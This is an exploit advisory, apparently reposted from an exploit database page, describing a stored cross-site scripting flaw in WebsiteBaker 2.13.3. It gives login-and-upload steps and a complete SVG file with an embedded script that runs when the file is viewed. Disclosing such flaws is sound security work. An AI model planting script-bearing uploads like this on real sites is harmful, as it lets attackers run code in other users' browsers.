Share
## https://sploitus.com/exploit?id=PACKETSTORM:173290
Exploit Title: WebsiteBaker v2.13.3 - Stored XSS  
Application: WebsiteBaker  
Version: 2.13.3  
Bugs: Stored XSS  
Technology: PHP  
Vendor URL: https://websitebaker.org/pages/en/home.php  
Software Link: https://wiki.websitebaker.org/doku.php/en/downloads  
Date of found: 26.06.2023  
Author: Mirabbas Ağalarov  
Tested on: Linux   
  
  
2. Technical Details & POC  
========================================  
steps:   
  
1. login to account  
2. go to media  
3. upload svg file  
  
"""  
<?xml version="1.0" standalone="no"?>  
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">  
  
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">  
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>  
<script type="text/javascript">  
alert(document.location);  
</script>  
</svg>  
"""  
4. go to svg file (http://localhost/media/malas.svg)